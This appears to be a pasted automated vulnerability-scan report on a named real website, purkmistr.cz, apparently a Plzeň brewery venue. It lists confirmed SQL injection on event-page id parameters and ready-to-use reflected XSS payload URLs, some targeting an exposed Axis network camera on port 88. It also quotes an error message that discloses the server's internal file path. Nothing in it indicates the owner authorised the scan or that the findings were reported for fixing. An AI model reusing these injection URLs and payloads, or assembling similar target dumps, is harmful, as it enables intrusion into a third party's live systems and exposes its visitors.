purkmistr.cz

1. http://www.purkmistr.cz/ - SQLi, XSS
2.  
3. ||| [High Possibility] SQL Injection
4. Severity: Critical
5. Confirmation: Confirmed
6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
7.  
8. Vulnerable URL: http://www.purkmistr.cz/plan-akci-purkmistr-plzen.php?id=%27
9. Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=%27
10. Vulnerable URL: http://www.purkmistr.cz/en_plan-akci-purkmistr-plzen.php?id=%27
11.  
12. |-| XSS (Cross-site Scripting)
13.  
14. Severity: Important
15. Confirmation: Confirmed
16. Vulnerable URL: http://www.purkmistr.cz/plan-akci-purkmistr-plzen.php?id=336'"--></style></script><script>alert(0x000134)</script>
17. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
18. Parameter Name: id
19. Parameter Type: Querystring
20. Attack Pattern: 336'"--></style></script><script>alert(0x000134)</script>
21.  
22. Severity: Important
23. Confirmation: Confirmed
24. Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=323'"--></style></script><script>alert(0x0007DB)</script>
25. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
26. Parameter Name: id
27. Parameter Type: Querystring
28. Attack Pattern: 323'"--></style></script><script>alert(0x0007DB)</script>
29.  
30. ||| Programming Error Message
31.  
32. Severity: Low
33. Confirmation: Confirmed
34. Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=%27
35. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
36. Identified Error Message: <b>Fatal error</b>: Call to a member function fetch_array() on a non-object in <b>/stor1/purkmistr/html/plan_akci.php</b> on line <b>164</b>
37. Parameter Name: id
38. Parameter Type: Querystring
39. Attack Pattern: %27
40.  
41. ||| Axis 2100 Network Camera - http://mail.purkmistr.cz:88/view/index.shtml
42.  
43. -|- XSS (Cross-site Scripting) -|-
44.  
45. Severity: Important
46. Confirmation: Confirmed
47. Vulnerable URL: http://mail.purkmistr.cz:88/view/'"--></style></script><script>alert(0x000024)</script>
48. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
49. Parameter Name: URI-BASED
50. Parameter Type: RawUrlInjection
51. Attack Pattern: '"--></style></script><script>alert(0x000024)</script>
52.  
53. Severity: Important
54. Confirmation: Confirmed
55. Vulnerable URL: http://mail.purkmistr.cz:88/view/index.shtml'"--></style></script><script>alert(0x000039)</script>
56. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
57. Parameter Name: URI-BASED
58. Parameter Type: RawUrlInjection
59. Attack Pattern: '"--></style></script><script>alert(0x000039)</script>
60.  
61. Severity: Important
62. Confirmation: Confirmed
63. Vulnerable URL: http://mail.purkmistr.cz:88/view/view.shtml'"--></style></script><script>alert(0x00003B)</script>
64. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
65. Parameter Name: URI-BASED
66. Parameter Type: RawUrlInjection
67. Attack Pattern: '"--></style></script><script>alert(0x00003B)</script>